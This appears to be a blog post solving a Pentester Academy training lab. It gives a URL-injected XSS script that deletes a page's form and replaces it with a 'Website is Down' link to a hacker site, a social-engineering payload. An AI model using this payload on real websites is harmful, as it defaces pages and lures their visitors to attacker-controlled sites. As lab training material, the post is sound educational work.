Hello all today I am going to post another solution to the task provided at Javascript for Pentester at Pentester Academy. This task is again focused on how to play with forms in Javascript. You can view solutions to the other tasks here.
Task 5: Social Engineering | Task Link
In this task, we have to do some social engineering with XSS. This task is pretty simple, you have to just remove the form element and add a new element with text as “Website is Down! Please visit SecurityTube.net”.
Solution:
To complete the task we have to start by investigating the source code, where we have to find our target area and that is form tag. Copy and URL-encode the code provided below and paste it after the url parameter in the URL bar
<script>
var frmcon = document.forms[0];
frmcon.parentNode.removeChild(frmcon);
var a = document.createElement('A');
atxt = document.createTextNode('Website is Down! Please visit SecurityTube.net');
a.setAttribute("href", "http://www.the-hacker-site.com");
a.appendChild(atxt);
document.getElementsByTagName('div')[3].appendChild(a);
</script>
First two lines of code will remove the form element and next four lines will create a new element, in my case I create an anchor or link with <a> tag and assign it a string value ‘Website is Down! Please visit SecurityTube.net’ and link to some hackers site. The last line will go and append the newly created child to the fourth div element (manually figured).
Replacement of form child node with another does not seem to work for me, maybe browser issues, that is why I create a new child node and append it to the div tag.
That’s all. Refer this post as a quick solution for the Javascript for Pentester tasks. For an in-depth video tutorial, please refer to the video solutions provided at Pentester Academy website.
